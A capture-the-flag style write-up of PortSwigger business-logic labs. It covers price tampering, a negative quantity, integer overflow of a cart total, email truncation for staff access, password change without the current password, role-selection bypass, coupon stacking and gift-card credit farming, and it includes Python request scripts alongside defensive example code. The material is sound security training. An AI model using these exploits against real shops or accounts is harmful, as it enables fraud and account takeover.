
Business Logic Labs Overview

Tools Used

  1. Burp Interceptor, Repeater and Intruder
  2. Python Scripts

Overview

  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

While adding a product to the cart, set its price in the request to a very low value!!

  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-high-level

We had to buy one leet jacket, but here we could not set the price. Hence we bought another item with a negative quantity and just bought one leet jacket.

Store credit: $59.30

Your order is on its way!

Name                                  Price      Quantity
Lightweight "l33t" Leather Jacket     $1337.00   1
Single Use Food Hider                 $86.42     -15
Total:                                $40.70

  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-low-level

Observation

The quantity field can be between (and including) [-1000000000, 99] and takes only whole numbers (wrong!! actually it will have an integer value, so [-Integer, +Integer]).

Actually it depends on the integer width being used, 16-bit or 32-bit:

if 16-bit then the range is [-32,768, +32,767]

if 32-bit then the range is [-2,147,483,648, +2,147,483,647]

We will target the total price.

Solution

The solution is in lowLevel.py. It's just that we had to exploit an integer overflow in the total price.

So we kept adding the price of an item × 99, and once it overflows we are in the negative region.

Then we keep adding and wait until it comes close to zero, and when it's near 0 we bring it within the

store credit, which is 100. The coded solution could have been more concise and better.

# hacky script, not a mature way to do this, but for a single lab it works
import requests


def find_between(s, first, last):
    """Return the substring of s between the first occurrence of `first` and the next `last`."""
    try:
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""


# URL, session cookie and headers copied from Burp (lab instance values)
burp0_url = "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net:443/cart"
burp0_cookies = {"session": "c7pFdZwzFg3lpGem8KWRBHqPLBJbeEh3"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net/cart", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"}
# greatest positive integer for 16 bit is +32,767
# but here we can add only 99 at a time, so +32,767 / 99 = 329.56
# so we will test integer overflow
for i in range(1, 1000):
    print(i)
    # add the product to the cart again; the server recomputes the total on every request
    burp0_data = {"productId": "1", "quantity": 2, "redir": "CART"}
    result = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    html = result.text
    # once the total has wrapped, the cart page renders it as "<th>-$...</th>"
    price = find_between(html, "<th>-$", "</th>")
    try:
        price = float(price) * -1
        print(price)
        # stop when the wrapped total sits between -4*1339 and -2*1339
        if -4 * 1339 < price < -2 * 1339:
            break
    except Exception as e:
        print(e)  # find_between returned "" while the total is still positive

    print(price)
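To see why the total goes negative and what the server should have done instead, here is an added example (not lowLevel.py and not PortSwigger's code) that models the backend's total in 32-bit signed arithmetic next to a validating version. The 32-bit model, the `validate_cart` and `safe_total_cents` names, the rule set and the prices in cents are assumptions; the negative-quantity case from the high-level lab is covered by the same check.

```python
# Added example (not the lab's code): a cart total computed with 32-bit signed
# wraparound and no bounds checks, next to a version that validates quantities and
# the running total before any arithmetic can wrap. Prices are in cents and the
# 32-bit model of the backend is an assumption.
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def wrap_int32(value: int) -> int:
    """Reduce an arbitrary Python int to what a 32-bit signed integer would hold."""
    return (value + 2**31) % 2**32 - 2**31


def vulnerable_total_cents(cart):
    """Sum price * quantity per line, wrapping at int32 after every step.
    cart is a list of (price_cents, quantity) tuples."""
    total = 0
    for price_cents, quantity in cart:
        total = wrap_int32(total + wrap_int32(price_cents * quantity))
    return total


class CartError(ValueError):
    """Raised when a cart violates a business rule."""


def validate_cart(cart, max_quantity=99):
    """Return a list of rule violations; an empty list means the cart is acceptable.

    Rules: quantity is a whole number in 1..max_quantity, prices are non-negative
    integers, and the running total must fit the storage type before it is stored.
    """
    errors = []
    total = 0
    for index, (price_cents, quantity) in enumerate(cart):
        if type(quantity) is not int or not 1 <= quantity <= max_quantity:
            errors.append(f"line {index}: quantity {quantity!r} outside 1..{max_quantity}")
            continue
        if type(price_cents) is not int or price_cents < 0:
            errors.append(f"line {index}: invalid price {price_cents!r}")
            continue
        total += price_cents * quantity  # Python ints do not wrap, so this is exact
        if total > INT32_MAX:
            errors.append(f"line {index}: cart total {total} exceeds {INT32_MAX}")
            break
    return errors


def safe_total_cents(cart, max_quantity=99):
    """Total in cents, or CartError if any rule is violated."""
    errors = validate_cart(cart, max_quantity)
    if errors:
        raise CartError("; ".join(errors))
    return sum(price_cents * quantity for price_cents, quantity in cart)


if __name__ == "__main__":
    jacket = (133700, 99)  # $1337.00 x 99, the largest line the lab's form accepts
    # Constructed scenario: 163 such lines push the int32 total past INT32_MAX.
    print(vulnerable_total_cents([jacket] * 162))  # still positive
    print(vulnerable_total_cents([jacket] * 163))  # wrapped negative
    print(validate_cart([(8642, -15)]))            # negative quantity rejected
    print(validate_cart([jacket] * 163))           # overflow rejected before it happens
```

The check that matters is the comparison against INT32_MAX on the exact running total: it runs before the value reaches the narrow storage type, so there is no point at which the backend ever holds a wrapped number.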
  1. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-inconsistent-handling-of-exceptional-input

So eventually I had to view the solution 😢. Here we had to play with the string length. The backend only considers

the first 255 characters of a string and truncates the rest. So the email id is:

very-long-string-very-long-string-very-long-string-very-long-string-very-long-string-very-long-string-very-long-stringabcabcbabcabcabacabcabcabcabcabcabcabcabcabcabcabcaabcvery-long-string-very-long-very-long-string-very-long-very-long-st@dontwannacry.com.exploit-ac041ff21ee42bb8c00c20b901ea00da.web-security-academy.net

That is 321 characters. After truncating it to 255 characters we get the email id <a very big string>@dontwannacry.com, which is a staff email id and is required to access the admin account. Hence we have solved the lab.
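The flaw here is that the confirmation mail goes to one value and the privilege decision is made on another. As an added example (not the lab's code), the two registration handlers below model that: the vulnerable one truncates on storage and derives staff status from the stored copy, the safe one rejects anything longer than 255 characters and decides on the exact address it verified. The function names, the `constructed_overlong_address` helper and the `example.test` domain are assumptions; the 255-character limit and the staff domain are from the write-up.

```python
# Added example (not the lab's code): registration that validates the staff domain
# on one value and stores another, next to a version that refuses to truncate.
# MAX_EMAIL_LENGTH and STAFF_DOMAIN follow the write-up; everything else is constructed.
MAX_EMAIL_LENGTH = 255
STAFF_DOMAIN = "dontwannacry.com"


def domain_of(email: str) -> str:
    """Domain part of an address (after the last '@'), lower-cased."""
    return email.rsplit("@", 1)[-1].lower()


def register_vulnerable(email: str) -> dict:
    """The confirmation goes to the full address, but the column is 255 characters
    wide, so the stored copy is silently cut and staff status is derived from it."""
    confirmation_sent_to = email                 # mailbox the submitter controls
    stored = email[:MAX_EMAIL_LENGTH]            # silent truncation on storage
    return {
        "confirmation_sent_to": confirmation_sent_to,
        "stored_email": stored,
        "is_staff": domain_of(stored) == STAFF_DOMAIN,
    }


def register_safe(email: str) -> dict:
    """Reject anything that cannot be stored verbatim, then derive privilege from
    the exact value that the confirmation was sent to."""
    if len(email) > MAX_EMAIL_LENGTH:
        return {"error": f"email longer than {MAX_EMAIL_LENGTH} characters"}
    if email.count("@") != 1 or not domain_of(email) or not email.split("@")[0]:
        return {"error": "malformed email"}
    return {
        "confirmation_sent_to": email,
        "stored_email": email,
        "is_staff": domain_of(email) == STAFF_DOMAIN,
    }


def constructed_overlong_address(controlled_domain: str) -> str:
    """Constructed input for the checks below: exactly 255 characters ending in
    '@dontwannacry.com', followed by a suffix naming a mailbox the submitter reads."""
    local_part = "a" * (MAX_EMAIL_LENGTH - len("@" + STAFF_DOMAIN))
    return f"{local_part}@{STAFF_DOMAIN}.{controlled_domain}"


if __name__ == "__main__":
    probe = constructed_overlong_address("example.test")
    print(len(probe), register_vulnerable(probe)["is_staff"])   # 268 True
    print(register_safe(probe))                                  # rejected
    print(register_safe("carlos@dontwannacry.com")["is_staff"])  # True
```

The general rule the safe handler follows is to validate the length first and then never transform the value between validation and use; truncation, normalisation or case-folding after a check is the same bug in different clothes.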

  1. A very interesting lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-weak-isolation-on-dual-use-endpoint

From the theory on page https://portswigger.net/web-security/logic-flaws/examples

under heading >> Users won't always supply mandatory input

The request to change the user's password via the change-password endpoint takes this form:

POST /my-account/change-password HTTP/1.1
....
csrf=TnvFiRt2yrF7ZsTAZ5CEtnFHEj9LNk9d&username=administrator&curren-password=peter&new-password-1=peter&new-password-2=peter

HERE IT'S NOT NECESSARY TO SEND THE current-password PARAMETER !!!
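Two things go wrong in that request: the current-password check only runs if the parameter is present, and the account to change is taken from the request body. The following is an added example (not the lab's code) of a handler with both defects next to one that treats every field as mandatory and takes the target user from the session. The `USERS` dictionary, its plaintext passwords and the function names are constructed for illustration.

```python
# Added example (not the lab's code): a change-password handler that only verifies
# the current password when the parameter is present, next to one that treats the
# parameter as mandatory and takes the target user from the session, not the form.
# Passwords sit in a plain dict for illustration; a real store would hash them.
import hmac

USERS = {"wiener": "peter", "administrator": "correct horse battery staple"}  # constructed


def _password_matches(username: str, supplied: str) -> bool:
    """Constant-time comparison against the stored (here plaintext) password."""
    stored = USERS.get(username, "")
    return hmac.compare_digest(stored.encode(), supplied.encode())


def change_password_vulnerable(form: dict, session: dict) -> str:
    """Flaws: a missing current-password skips verification entirely, and the
    username comes from the request body, so any logged-in user can pick a target."""
    if "username" not in session:
        return "401 not logged in"
    username = form.get("username", session["username"])
    if "current-password" in form:                 # the check only runs if supplied
        if not _password_matches(username, form["current-password"]):
            return "403 wrong current password"
    if form.get("new-password-1") != form.get("new-password-2"):
        return "400 passwords do not match"
    USERS[username] = form["new-password-1"]
    return "200 password changed"


def change_password_safe(form: dict, session: dict) -> str:
    """Every field is mandatory and the account being changed is the session's own."""
    if "username" not in session:
        return "401 not logged in"
    required = ("current-password", "new-password-1", "new-password-2")
    missing = [name for name in required if not form.get(name)]
    if missing:
        return "400 missing mandatory parameter(s): " + ", ".join(missing)
    username = session["username"]                 # never trust form["username"]
    if not _password_matches(username, form["current-password"]):
        return "403 wrong current password"
    if form["new-password-1"] != form["new-password-2"]:
        return "400 passwords do not match"
    USERS[username] = form["new-password-1"]
    return "200 password changed"


if __name__ == "__main__":
    session = {"username": "wiener"}
    form = {"username": "administrator", "new-password-1": "x", "new-password-2": "x"}
    print(change_password_safe(form, session))        # 400 missing ... current-password
    print(change_password_vulnerable(form, session))  # 200 password changed
```

The safe variant checks for presence with `not form.get(name)`, so an empty string counts as missing too; an "if present then verify" structure is the shape to look for when reviewing any handler that re-authenticates the user.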

  1. A very tiring but interesting lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation

    1. Basic workflow: add products to cart > add valid coupon > checkout (if the value is less than the store credit)
    2. We cannot check out the l33t jacket as its value, 1337, is higher than the store credit, which is 100
    3. So, what we eventually did was add a product which costs less than 100 and do the checkout on it
    4. Then, after you have done the checkout, add your leet jacket and it will be added to your order

  2. https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-authentication-bypass-via-flawed-state-machine

    SOLVED IT !!

    MY SOLUTION

    1. Logged in and then in role-selector I sent the role as "admin"
    2. I logged out and then logged in again, but instead of getting redirected to role-selector I redirected myself to /admin. I believe the backend, when it redirects to /role-selector after login, clears your previous role (which I had selected as admin)
      1. Then as I was redirected to /admin I was able to delete carlos (sorry carlos 😢, it's just business)

    PORTSWIGGER SOLUTION

    1. With Burp running, complete the login process and notice that you need to select your role before you are taken to the home page. Use the content discovery tool to identify the /admin path.

    2. Try browsing to /admin directly from the role selection page and observe that this doesn't work.

    3. Log out and then go back to the login page. In Burp, turn on proxy intercept then log in. Forward the POST /login request. The next request is GET /role-selector. Drop this request and then browse to the lab's home page. Observe that your role has defaulted to the administrator role and you have access to the admin panel. Delete Carlos to solve the lab.

      OKAY SO I WAS WRONG THE DEFAULT ROLE IS ADMINISTRATOR

    Observation 23 Nov

    1. Logged in as wiener; then you are redirected to the role-selector page, you select a role and then you are properly logged in (e.g. you can see my-account)
      1. If you go to role-selector again and select a role, you get the error "No login credentials"
      2. Now if you set the role again, you are redirected to login and your session expires, hence the "my-account" page is not visible.
      3. If you just go to the role-selector page and then to the my-account page, your session expires too.
      4. If you don't select a role in role-selector directly after login (the redirection), you won't get access to the my-account page and will be redirected to login if you visit my-account.

    Observations 22 Nov

    1. When you log in it takes you directly to role-selector, and then you select a role.
    2. When you log out and log in again you have to select a role again
    3. The administrator page is at /admin
    4. In the role-selector POST request, you can send role as "administrator"
      1. When you are not logged in you get this response [image not included in the export]
      2. When you are logged in you are just redirected
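Both of these labs come down to the server holding no explicit record of where in a multi-step flow the user is. The following is an added example (not the labs' or PortSwigger's code) of the pattern that fixes both: a `Session` whose role is never defaulted and can only be selected once, straight after login, and an `Order` whose final confirmation re-validates the cart instead of trusting the earlier checkout. The usernames, the roles each may hold, the prices and the store credit are constructed; `add()` is left without a state check on purpose, to reproduce the workflow lab's flaw.

```python
# Added example (not the labs' code): explicit server-side state for the
# login -> role-selector -> home flow and for the cart -> checkout -> confirm flow.
# Usernames, the roles each may pick, prices and the store credit are constructed.
ALLOWED_ROLES = {"wiener": {"user"}, "administrator": {"user", "administrator"}}


class Session:
    """States: anonymous -> credentials_verified -> role_selected."""

    def __init__(self):
        self.state, self.username, self.role = "anonymous", None, None

    def login(self, username):
        self.state, self.username, self.role = "credentials_verified", username, None

    def select_role(self, role):
        """Valid only once, straight after login, and only for a role this user may hold."""
        if self.state != "credentials_verified":
            return False
        if role not in ALLOWED_ROLES.get(self.username, set()):
            return False
        self.state, self.role = "role_selected", role
        return True

    def can_access(self, path):
        """Deny unless the whole flow completed; /admin also needs the administrator role."""
        if self.state != "role_selected":
            return False
        if path.startswith("/admin"):
            return self.role == "administrator"
        return True


def vulnerable_can_access_admin(session_role):
    """The behaviour PortSwigger's solution describes: a missing role is treated
    as administrator because that is the default the backend falls back to."""
    return (session_role or "administrator") == "administrator"


class Order:
    """States: cart -> checked_out -> paid. add() deliberately has no state check,
    reproducing the workflow lab's flaw; the two confirm variants differ only in
    whether the total is re-validated at the final step."""

    def __init__(self, credit_cents):
        self.state, self.credit_cents, self.items = "cart", credit_cents, []

    def add(self, price_cents):
        self.items.append(price_cents)

    def total_cents(self):
        return sum(self.items)

    def checkout(self):
        if self.state != "cart" or self.total_cents() > self.credit_cents:
            return False
        self.state = "checked_out"
        return True

    def confirm_vulnerable(self):
        """Trusts that checkout already validated the total."""
        if self.state != "checked_out":
            return False
        self.state, self.credit_cents = "paid", self.credit_cents - self.total_cents()
        return True

    def confirm_safe(self):
        """Re-validates the current cart against the credit before completing."""
        if self.state != "checked_out" or self.total_cents() > self.credit_cents:
            return False
        self.state, self.credit_cents = "paid", self.credit_cents - self.total_cents()
        return True


if __name__ == "__main__":
    s = Session()
    s.login("wiener")
    print(s.can_access("/admin"), vulnerable_can_access_admin(None))   # False True
    o = Order(10000)
    o.add(8642)
    print(o.checkout())        # True: 86.42 fits in 100.00
    o.add(133700)              # jacket added after checkout
    print(o.confirm_safe())    # False: re-validation catches it
```

The dropped GET /role-selector request in PortSwigger's solution is exactly the transition this `Session` refuses: with no role selected the state stays `credentials_verified`, so every page, not just /admin, is denied until the step is completed.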

  3. Lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-flawed-enforcement-of-business-rules

    1. Two coupons: NEWCUST5 and SIGNUP30 (the latter you get when you sign up for the newsletter)

    Solution is

    Add the codes one after another (SIGNUP30 you get from signing up for the newsletter and NEWCUST5 is readily available)

  4. Lab url : https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money

    1. Buy the product "Gift Card" (with product id 2) and apply a discount on it via code SIGNUP30; you will then get a discounted card, but the gift card's value is still 10. Hence use that code and refill your credit to a value of more than 100.
    2. Now continue doing this, adding multiple gift cards and accumulating enough store credit to purchase the leet jacket


# Used this code to apply the gift card codes.
import requests

# gift card codes obtained from the discounted purchases, one per line
giftCards = '''
2DlHFSTMZY
aUkZZ9nQP7
rCoKrvDFVY
8sv5pB8Tva
aCG945Mzsa
'''
giftCards = giftCards.split()
# URL, session cookie and headers copied from Burp (lab instance values)
burp0_url = "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net:443/gift-card"
burp0_cookies = {"session": "kGqJ6lLJnEPma5B72BZLKKZTlYmqhNGy"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net/my-account?id=wiener", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"}
for card in giftCards:
    print(card)
    # csrf value as captured in Burp for this session; one redeem request per card
    burp0_data = {"csrf": "Y8kdJyCdvwzvHEYTIJKraDXqW8GYXQh3", "gift-card": card}
    requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
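The last two labs share one root cause: the business rule is enforced against the wrong record. "Not the same coupon twice in a row" is checked against only the previous code, and the percentage discount is applied to a product whose redemption value is fixed. As an added example (not the labs' code), the cart below keeps the full list of accepted codes and keeps gift cards out of percentage discounts; it also carries the flawed variants so the two behaviours can be compared. The two coupon codes are the ones from the write-up; the additive stacking model, item names and prices are constructed.

```python
# Added example (not the labs' code): a cart that records every coupon applied,
# rather than only the last one, and that keeps gift cards out of percentage
# discounts so a card can never be bought for less than it redeems for. Coupon codes
# are the two from the write-up; the stacking model, item names and prices are constructed.
COUPONS = {"NEWCUST5": 5, "SIGNUP30": 30}   # code -> percent off


class Cart:
    def __init__(self):
        self.items = []      # (name, price_cents, is_gift_card)
        self.applied = []    # coupon codes in the order they were accepted

    def add(self, name, price_cents, is_gift_card=False):
        self.items.append((name, price_cents, is_gift_card))

    def apply_coupon_flawed(self, code):
        """Lab behaviour: rejects only a code identical to the previous one,
        so alternating two valid codes stacks them without limit."""
        if code not in COUPONS or (self.applied and code == self.applied[-1]):
            return False
        self.applied.append(code)
        return True

    def apply_coupon_safe(self, code):
        """Each code is accepted at most once per order, whatever the sequence."""
        if code not in COUPONS or code in self.applied:
            return False
        self.applied.append(code)
        return True

    def total_cents(self, discount_gift_cards=False):
        """Apply the combined percentage (capped at 100) to discountable lines.
        discount_gift_cards=True reproduces the infinite-money flaw."""
        percent = min(sum(COUPONS[code] for code in self.applied), 100)
        total = 0
        for _name, price_cents, is_gift_card in self.items:
            if is_gift_card and not discount_gift_cards:
                total += price_cents             # redemption value, never discounted
            else:
                total += price_cents * (100 - percent) // 100
        return total


if __name__ == "__main__":
    c = Cart()
    c.add("l33t jacket", 133700)
    for code in ("NEWCUST5", "SIGNUP30", "NEWCUST5", "SIGNUP30"):
        print(code, c.apply_coupon_flawed(code))   # all accepted when alternating
    print(c.total_cents())                         # 70% off once four codes stack
    g = Cart()
    g.add("gift card", 1000, is_gift_card=True)
    g.apply_coupon_safe("SIGNUP30")
    print(g.total_cents(discount_gift_cards=True), g.total_cents())   # 700 1000
```

The membership test `code in self.applied` is the whole fix for the coupon lab; for the gift-card lab the rule lives in `total_cents`, where a flag on the product decides whether a percentage may touch its price at all.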